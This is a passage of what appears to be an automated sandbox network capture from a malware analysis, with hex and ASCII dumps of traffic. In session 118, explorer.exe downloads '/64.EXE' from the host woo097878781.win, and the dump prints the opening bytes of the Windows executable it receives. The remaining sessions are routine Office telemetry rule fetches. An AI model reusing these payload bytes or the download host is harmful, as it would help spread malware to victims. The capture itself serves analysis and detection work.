DS3:O_)?%"U#3C?5#XP'G/F31% "B>)_]#2?ST<B$=GJ8"_^;(_?+:/23%4B-"G./"(Y&(".5S6N26-QD$;1]8]UF##"&\[08E"P.I.)6FBY'SU ^63B;>3'IB6#F3"L3"R2396%1R>!.9G:$<!&52_AV
2024-12-08 18:53:53 UTC	16384	IN	Data Raw: 3f 05 1f 2e 39 30 1b 04 33 1c 39 3c 3a 55 51 0d 19 04 0a 53 53 30 17 23 14 59 2d 5b 58 5f 10 02 21 36 32 33 49 3b 36 2d 09 3e 1f 2f 3c 11 35 0d 2e 44 33 07 29 2d 09 21 27 59 03 10 40 0b 18 21 45 19 21 36 20 3c 42 39 38 14 01 4f 42 50 00 32 40 13 28 09 53 33 14 0b 45 39 01 0c 1b 3b 33 19 43 2c 32 0f 3f 25 32 2e 3e 30 2d 24 04 07 06 04 39 05 38 3e 50 1e 2d 5b 46 05 35 3a 04 07 29 2e 38 37 19 3a 39 21 07 12 07 50 29 26 20 2c 14 3e 3b 3f 3d 09 04 45 50 22 28 02 17 17 24 0f 5b 0a 05 46 35 32 4e 08 23 1f 37 30 40 21 05 14 00 09 0d 3f 34 0d 2a 2e 50 22 1a 16 3e 02 27 1f 3b 13 5c 43 05 3d 1e 21 1c 1c 09 1d 0d 05 2d 2d 52 0a 1f 26 17 06 20 11 23 3a 39 58 54 5b 59 24 26 57 15 06 21 18 1d 27 40 40 1a 53 0a 1f 1d 20 28 03 47 09 13 52 0f 1c 16 3a 02 47 30 09 0c 53 07 Data Ascii: ?.9039<:UQSS0#Y-[X_!623I;6->/<5.D3)-!'Y@!E!6 <B98OBP2@(S3E9;3C,2?%2.>0-$98>P-[F5:).87:9!P)& ,>;?=EP"($[F52N#70@!?4*.P">';\C=!--R& #:9XT[Y$&W!'@@S (GR:G0S
2024-12-08 18:53:53 UTC	16384	IN	Data Raw: 45 45 1d 1c 3a 50 5e 18 24 07 20 3a 46 24 0a 10 00 27 02 19 37 20 3c 12 13 1b 55 36 27 5f 29 10 46 05 3a 23 35 2f 5a 00 27 17 1c 47 35 0d 0b 27 2d 02 39 32 10 1f 15 12 39 20 35 2d 56 3b 14 4e 3c 19 32 05 4d 0a 30 3e 02 00 22 12 3e 51 27 0b 44 1a 20 23 37 23 27 08 36 5a 1e 22 26 21 57 33 30 23 3a 16 16 58 4d 3d 27 26 53 34 42 12 56 2b 1e 49 1a 2e 13 36 35 04 23 36 4c 33 28 1b 12 21 3f 44 05 33 48 3c 44 38 38 12 33 1b 42 2b 29 5e 33 19 37 41 2a 41 0e 53 08 3c 48 37 0c 38 16 3a 46 44 3e 42 4a 02 46 01 39 57 44 3f 27 26 00 00 1f 3a 18 33 34 13 12 10 49 23 02 02 29 2e 31 08 24 4d 07 4e 1f 05 2c 2c 32 00 12 36 45 0b 17 29 3e 48 3e 18 55 4c 04 2f 29 3e 10 01 20 12 50 36 0f 00 25 05 20 08 30 47 28 55 08 16 31 52 02 0c 45 40 09 12 34 2e 0f 45 0b 5c 0b 33 3a 33 4d Data Ascii: EE:P^$ :F$'7 <U6'_)F:#5/Z'G5'-929 5-V;N<2M0>">Q'D #7#'6Z"&!W30#:XM='&S4BV+I.65#6L3(!?D3H<D883B+)^37A*AS<H78:FD>BJF9WD?'&:34I#).1$MN,,26E)>H>UL/)> P6% 0G(U1RE@4.E\3:3M
2024-12-08 18:53:53 UTC	16384	IN	Data Raw: 3f 12 1f 25 3d 1f 4d 10 3f 29 32 2d 01 3d 2e 5e 3a 49 48 0e 4c 1e 2f 3a 3e 5c 5f 00 2a 39 37 2c 1a 47 1a 18 4b 39 1a 00 15 28 3f 2e 03 2e 54 21 13 09 06 20 57 02 3c 3d 00 3a 5f 2a 1d 05 03 12 4e 0d 01 3c 3c 50 45 47 34 0b 28 10 46 1c 30 3f 14 18 06 06 34 17 53 01 1c 5a 08 2d 2c 53 32 57 34 23 39 0f 41 2c 24 25 18 21 1c 3a 41 50 51 57 40 40 37 0e 06 35 56 09 10 0a 09 55 2a 21 2f 4d 24 19 05 0d 12 0d 3a 22 36 25 2a 3e 46 02 0a 09 24 03 16 09 25 0e 53 33 19 0e 50 22 0c 28 5b 29 02 26 01 23 4d 21 4d 3b 02 00 33 16 47 57 4b 1f 47 37 1e 53 00 19 34 59 17 14 17 56 1c 1f 53 4f 10 22 10 27 3b 39 0c 20 05 20 3f 58 40 00 28 3c 1d 1c 1e 59 53 1f 23 1c 30 47 09 5a 25 1f 09 53 10 13 2d 5c 49 42 01 3d 43 13 1c 15 2d 09 02 16 4e 07 40 12 20 18 51 20 23 3a 37 11 38 3c 52 Data Ascii: ?%=M?)2-=.^:IHL/:>\_97,GK9(?..T! W<=:_N<<PEG4(F0?4SZ-,S2W4#9A,$%!:APQW@@75VU!/M$:"6%>F$%S3P"([)&#M!M;3GWKG7S4YVSO"';9 ?X@(<YS#0GZ%S-\IB=C-N@ Q #:78<R

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
118	192.168.2.4	49895	154.216.20.243	443	4124	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:53:52 UTC	171	OUT	GET /64.EXE HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0 Host: woo097878781.win
2024-12-08 18:53:53 UTC	274	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 08 Dec 2024 18:53:52 GMT Content-Type: application/x-msdos-program Content-Length: 1021952 Last-Modified: Mon, 18 Nov 2024 12:28:55 GMT Connection: close ETag: "673b3307-f9800" X-Powered-By: PleskLin Accept-Ranges: bytes
2024-12-08 18:53:53 UTC	16110	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a9 48 87 75 ed 29 e9 26 ed 29 e9 26 ed 29 e9 26 f6 b4 77 26 e7 29 e9 26 e4 51 6e 26 ec 29 e9 26 e4 51 7a 26 fc 29 e9 26 ed 29 e8 26 4f 29 e9 26 f6 b4 42 26 d9 29 e9 26 f6 b4 43 26 90 29 e9 26 f6 b4 74 26 ec 29 e9 26 52 69 63 68 ed 29 e9 26 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 05 00 ea e3 36 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0a 00 00 46 0d Data Ascii: MZ@!L!This program cannot be run in DOS mode.$Hu)&)&)&w&)&Qn&)&Qz&)&)&O)&B&)&C&)&t&)&Rich)&PEd6g"F
2024-12-08 18:53:53 UTC	16384	IN	Data Raw: 24 60 ff 15 ba 16 0d 00 8b 44 24 68 39 44 24 48 0f 85 8d 01 00 00 48 c7 44 24 78 00 00 00 00 48 8d 15 8c 26 0d 00 48 8b 4c 24 70 e8 92 6b 00 00 48 89 44 24 78 48 83 7c 24 78 00 0f 84 62 01 00 00 48 8d 15 7a 26 0d 00 48 8b 4c 24 78 e8 70 6b 00 00 48 89 84 24 80 00 00 00 48 83 bc 24 80 00 00 00 00 0f 84 3a 01 00 00 48 8b 84 24 80 00 00 00 48 83 c0 11 48 89 84 24 80 00 00 00 c7 84 24 88 00 00 00 00 00 00 00 48 63 84 24 88 00 00 00 48 8b 8c 24 80 00 00 00 0f be 04 01 83 f8 22 74 12 8b 84 24 88 00 00 00 ff c0 89 84 24 88 00 00 00 eb d5 4c 8d 84 24 98 00 00 00 8b 94 24 88 00 00 00 48 8b 8c 24 80 00 00 00 e8 c3 ab 0b 00 48 89 84 24 90 00 00 00 48 83 bc 24 90 00 00 00 00 0f 84 bd 00 00 00 48 8b 84 24 90 00 00 00 48 83 c0 05 48 89 84 24 b0 00 00 00 8b 84 24 98 00 Data Ascii: $`D$h9D$HHD$xH&HL$pkHD$xH\|$xbHz&HL$xpkH$H$:H$HH$$Hc$H$"t$$L$$H$H$H$H$HH$$
2024-12-08 18:53:53 UTC	16384	IN	Data Raw: 00 00 00 48 8d 8c 24 b8 00 00 00 e8 92 2d 00 00 8b 8c 24 38 01 00 00 48 63 94 24 f4 00 00 00 4c 8b 84 24 30 01 00 00 49 8d 14 50 48 89 94 24 10 01 00 00 4c 8b c8 4c 8d 05 45 f6 0c 00 8b d1 48 8b 84 24 10 01 00 00 48 8b c8 e8 43 9d 0b 00 8b 8c 24 f4 00 00 00 03 c8 8b c1 89 84 24 f4 00 00 00 8b 84 24 38 01 00 00 48 63 8c 24 f4 00 00 00 48 8b 94 24 30 01 00 00 48 8d 0c 4a 4c 8d 05 1b f6 0c 00 8b d0 e8 08 9d 0b 00 8b 8c 24 f4 00 00 00 03 c8 8b c1 89 84 24 f4 00 00 00 48 8d 8c 24 b8 00 00 00 e8 e9 2b 00 00 90 48 8d 8c 24 90 00 00 00 e8 db 2b 00 00 90 48 8d 4c 24 30 e8 d0 2b 00 00 90 48 8d 4c 24 60 e8 c5 2b 00 00 48 8b 8c 24 18 01 00 00 48 33 cc e8 b5 9e 0b 00 48 81 c4 28 01 00 00 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 4c 89 44 24 18 48 89 54 24 10 48 89 4c Data Ascii: H$-$8Hc$L$0IPH$LLEH$HC$$$8Hc$H$0HJL$$H$+H$+HL$0+HL$`+H$H3H(LD$HT$HL
2024-12-08 18:53:53 UTC	16384	IN	Data Raw: 84 24 30 01 00 00 ff c0 89 84 24 30 01 00 00 48 63 84 24 30 01 00 00 48 83 f8 6a 0f 83 e6 00 00 00 83 bc 24 f0 0a 00 00 00 74 7a 48 63 84 24 30 01 00 00 48 8d 0d a8 b5 0d 00 4c 8d 8c 24 40 01 00 00 41 b8 08 00 00 00 8b 94 24 f0 0a 00 00 48 8b 0c c1 e8 da fc ff ff 48 8d 94 24 40 01 00 00 48 8b 4c 24 30 ff 15 f7 94 0c 00 48 89 84 24 c0 09 00 00 48 63 84 24 30 01 00 00 48 8d 0d 90 c6 0d 00 48 8b 04 c1 48 8b 8c 24 c0 09 00 00 48 89 08 48 83 bc 24 c0 09 00 00 00 75 07 33 c0 e9 ff 13 00 00 eb 5d 48 63 84 24 30 01 00 00 48 8d 0d 2e b5 0d 00 48 8b 04 c1 48 83 c0 08 48 8b d0 48 8b 4c 24 30 ff 15 98 94 0c 00 48 89 84 24 c8 09 00 00 48 63 84 24 30 01 00 00 48 8d 0d 31 c6 0d 00 48 8b 04 c1 48 8b 8c 24 c8 09 00 00 48 89 08 48 83 bc 24 c8 09 00 00 00 75 07 33 c0 e9 a0 Data Ascii: $0$0Hc$0Hj$tzHc$0HL$@A$HH$@HL$0H$Hc$0HHH$HH$u3]Hc$0H.HHHHL$0H$Hc$0H1HH$HH$u3
2024-12-08 18:53:53 UTC	16384	IN	Data Raw: 1c 8b 44 24 14 99 83 e2 03 03 c2 c1 f8 02 8b 4c 24 1c 2b c8 8b c1 89 44 24 14 8b 44 24 14 05 f4 05 00 00 89 44 24 08 66 0f 6e 44 24 08 f3 0f e6 c0 f2 0f 5c 05 a1 eb 0c 00 f2 0f 5e 05 91 eb 0c 00 f2 0f 2c c0 89 44 24 0c 8b 44 24 0c 25 ff 7f 00 00 69 c0 ad 8e 00 00 99 b9 64 00 00 00 f7 f9 89 44 24 18 8b 44 24 18 8b 4c 24 08 2b c8 8b c1 66 0f 6e c0 f3 0f e6 c0 f2 0f 5e 05 4a eb 0c 00 f2 0f 2c c0 89 04 24 66 0f 6e 04 24 f3 0f e6 c0 f2 0f 10 0d 32 eb 0c 00 f2 0f 59 c8 66 0f 28 c1 f2 0f 2c c0 89 44 24 10 8b 44 24 18 8b 4c 24 08 2b c8 8b c1 2b 44 24 10 48 8b 4c 24 40 89 41 10 83 3c 24 0e 7d 0b 8b 04 24 ff c8 89 44 24 20 eb 0a 8b 04 24 83 e8 0d 89 44 24 20 48 8b 44 24 40 8b 4c 24 20 89 48 0c 48 8b 44 24 40 83 78 0c 02 7e 0f 8b 44 24 0c 2d 6c 12 00 00 89 44 24 24 Data Ascii: D$L$+D$D$D$fnD$\^,D$D$%idD$D$L$+fn^J,$fn$2Yf(,D$D$L$++D$HL$@A<$}$D$ $D$ HD$@L$ HHD$@x~D$-lD$$
2024-12-08 18:53:53 UTC	16384	IN	Data Raw: 75 0a 48 8b 44 24 38 48 89 44 24 20 83 bc 24 0c 01 00 00 00 7c 37 c7 44 24 34 00 00 00 00 eb 0a 8b 44 24 34 ff c0 89 44 24 34 8b 84 24 0c 01 00 00 39 44 24 34 7d 14 48 63 44 24 34 48 8b 4c 24 38 0f be 04 01 85 c0 74 02 eb d5 eb 0e 48 8b 4c 24 38 e8 0b 15 00 00 89 44 24 34 e9 fb 04 00 00 0f b6 84 24 08 01 00 00 83 f8 0e 75 0d c7 84 24 f4 01 00 00 22 00 00 00 eb 0b c7 84 24 f4 01 00 00 27 00 00 00 0f b6 84 24 f4 01 00 00 88 84 24 70 01 00 00 0f b6 84 24 e0 00 00 00 85 c0 74 17 48 8b 8c 24 f0 00 00 00 e8 85 07 00 00 48 89 84 24 68 01 00 00 eb 28 48 8b 84 24 40 02 00 00 48 83 c0 08 48 89 84 24 40 02 00 00 48 8b 84 24 40 02 00 00 48 8b 40 f8 48 89 84 24 68 01 00 00 48 83 bc 24 68 01 00 00 00 75 0d c7 84 24 f8 01 00 00 01 00 00 00 eb 0b c7 84 24 f8 01 00 00 00 Data Ascii: uHD$8HD$ $\|7D$4D$4D$4$9D$4}HcD$4HL$8tHL$8D$4$u$"$'$$p$tH$H$h(H$@HH$@H$@H@H$hH$hu$$
2024-12-08 18:53:53 UTC	16384	IN	Data Raw: 00 00 48 8b 4c 24 38 4c 8b 49 30 4c 8d 05 b8 28 0d 00 8b d0 b9 0a 08 00 00 e8 14 ec ff ff 89 44 24 30 83 7c 24 40 02 7c 29 8b 05 3b 0c 0d 00 ff c0 48 8b 4c 24 38 48 83 c1 10 c7 44 24 20 00 00 00 00 41 b9 01 00 00 00 45 33 c0 8b d0 e8 c0 fb ff ff 83 7c 24 68 00 75 11 83 7c 24 40 01 7c 0a 48 8b 4c 24 38 e8 48 fd ff ff 83 7c 24 40 03 7c 28 48 8b 44 24 38 48 83 c0 10 c7 44 24 20 00 00 00 00 41 b9 01 00 00 00 45 33 c0 8b 15 d9 0b 0d 00 48 8b c8 e8 79 fb ff ff 48 8b 44 24 38 0f b6 4c 24 68 88 48 18 8b 44 24 30 48 83 c4 58 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 89 54 24 10 48 89 4c 24 08 33 c0 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 54 24 10 48 89 4c 24 08 33 c0 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: HL$8LI0L(D$0\|$@\|);HL$8HD$ AE3\|$hu\|$@\|HL$8H\|$@\|(HD$8HD$ AE3HyHD$8L$hHD$0HXT$HL$3HT$HL$3
2024-12-08 18:53:53 UTC	16384	IN	Data Raw: 48 8b 44 24 60 48 63 40 08 48 8b 4c 24 20 48 03 c8 48 8b c1 48 89 44 24 38 48 8b 44 24 38 48 8b 4c 24 20 48 89 08 48 8b 44 24 38 48 83 c0 38 48 8b 4c 24 38 48 89 41 08 48 8b 44 24 38 c6 40 15 01 48 8b 44 24 38 c6 40 16 00 48 8b 44 24 38 48 8b 4c 24 60 48 8b 49 40 48 89 48 18 48 8b 44 24 60 48 8b 4c 24 38 48 89 48 40 48 8b 44 24 60 48 63 40 10 48 8b 4c 24 20 48 03 c8 48 8b c1 48 89 44 24 20 e9 60 ff ff ff 48 8b 44 24 60 48 83 78 40 00 74 0a c7 44 24 48 01 00 00 00 eb 08 c7 44 24 48 00 00 00 00 8b 44 24 48 48 83 c4 58 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 89 4c 24 08 48 83 ec 38 48 c7 44 24 20 00 00 00 00 8b 05 25 8d 0d 00 39 44 24 40 0f 8f 92 00 00 00 48 8b 0d 30 8d 0d 00 e8 83 56 ff ff 48 8b 05 2c 8d 0d 00 48 89 44 24 20 48 83 7c 24 Data Ascii: HD$`Hc@HL$ HHHD$8HD$8HL$ HHD$8H8HL$8HAHD$8@HD$8@HD$8HL$`HI@HHHD$`HL$8HH@HD$`Hc@HL$ HHHD$ `HD$`Hx@tD$HD$HD$HHXL$H8HD$ %9D$@H0VH,HD$ H\|$
2024-12-08 18:53:53 UTC	16384	IN	Data Raw: d2 8b 44 24 28 b9 08 00 00 00 f7 f1 8b c0 48 8b 4c 24 20 0f b6 44 01 10 8b 4c 24 28 83 e1 07 ba 01 00 00 00 d3 e2 8b ca 23 c1 85 c0 74 0a c7 44 24 08 01 00 00 00 eb 08 c7 44 24 08 00 00 00 00 8b 44 24 08 eb 68 eb 66 8b 44 24 28 33 d2 b9 7c 00 00 00 48 f7 f1 48 8b c2 89 44 24 04 8b 44 24 28 ff c0 89 44 24 28 8b 44 24 04 48 8b 4c 24 20 83 7c 81 10 00 74 35 8b 44 24 04 48 8b 4c 24 20 8b 54 24 28 39 54 81 10 75 07 b8 01 00 00 00 eb 1d 8b 44 24 04 ff c0 8b c0 33 d2 b9 7c 00 00 00 48 f7 f1 48 8b c2 89 44 24 04 eb bb 33 c0 48 83 c4 18 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 4c 24 08 48 83 ec 58 c7 44 24 20 00 00 00 00 48 8b 44 24 60 48 8b 40 20 48 89 44 24 28 48 8b 44 24 28 0f b6 40 09 83 f8 02 0f 84 a9 00 00 00 48 8b 4c 24 28 e8 75 01 00 00 89 44 Data Ascii: D$(HL$ DL$(#tD$D$D$hfD$(3\|HHD$D$(D$(D$HL$ \|t5D$HL$ T$(9TuD$3\|HHD$3HHL$HXD$ HD$`H@ HD$(HD$(@HL$(uD
2024-12-08 18:53:53 UTC	16384	IN	Data Raw: 10 48 8b 4c 24 28 48 8b 44 24 30 ff 90 00 01 00 00 48 8b 4c 24 28 e8 37 bc ff ff 48 8b 44 24 30 48 8b 48 70 e8 f9 a2 00 00 8b 44 24 20 48 83 c4 48 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 4c 24 08 48 8b 44 24 08 0f bf 40 2e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 4c 24 08 48 8b 44 24 08 48 8b 40 48 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 4c 24 08 48 8b 44 24 08 48 8b 40 08 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 4c 24 08 48 8b 44 24 08 0f b6 40 09 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 4c 24 08 48 83 ec 28 48 8b 4c 24 30 e8 7d 06 00 00 48 8b 44 24 30 0f bf 40 3c 85 c0 7c 26 48 8b 44 24 30 0f bf 40 3c 83 c0 03 8b d0 48 8b 4c 24 30 e8 28 00 00 00 b8 ff ff ff ff Data Ascii: HL$(HD$0HL$(7HD$0HHpD$ HHHL$HD$@.HL$HD$H@HHL$HD$H@HL$HD$@HL$H(HL$0}HD$0@<\|&HD$0@<HL$0(

Session ID	Source IP	Source Port	Destination IP	Destination Port
119	192.168.2.4	49897	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:53:53 UTC	192	OUT	GET /rules/rule701500v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 18:53:53 UTC	494	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:53:53 GMT Content-Type: text/xml Content-Length: 1364 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT ETag: "0x8DC582BEB6AD293" x-ms-request-id: 15e9867f-c01e-0046-5804-482db9000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185353Z-r1cf579d778dfdgnhC1EWRd3w000000005ug00000000a6vx x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 18:53:53 UTC	1364	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 63 75 72 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSecurity" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
120	192.168.2.4	49898	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:53:53 UTC	192	OUT	GET /rules/rule701501v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 18:53:53 UTC	494	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:53:53 GMT Content-Type: text/xml Content-Length: 1401 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:48 GMT ETag: "0x8DC582BE2A9D541" x-ms-request-id: 315ad4be-c01e-0014-2a03-48a6a3000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185353Z-r1cf579d778qlpkrhC1EWRpfc800000006w0000000002y6a x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 18:53:53 UTC	1401	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenS

Session ID	Source IP	Source Port	Destination IP	Destination Port
121	192.168.2.4	49899	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:53:53 UTC	192	OUT	GET /rules/rule702801v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 18:53:53 UTC	494	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:53:53 GMT Content-Type: text/xml Content-Length: 1391 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT ETag: "0x8DC582BDF58DC7E" x-ms-request-id: 4c8a77f3-f01e-0020-1a90-49956b000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185353Z-r1cf579d7782v2q5hC1EWRt9bw00000000wg0000000059p0 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 18:53:53 UTC	1391	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S

Session ID	Source IP	Source Port	Destination IP	Destination Port
122	192.168.2.4	49901	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:53:53 UTC	192	OUT	GET /rules/rule702800v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 18:53:53 UTC	494	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:53:53 GMT Content-Type: text/xml Content-Length: 1354 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT ETag: "0x8DC582BE0662D7C" x-ms-request-id: 123741ec-101e-008d-5b05-4892e5000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185353Z-r1cf579d778dc6d7hC1EWR2vs800000006x000000000199k x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 18:53:53 UTC	1354	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S="Medium" /> 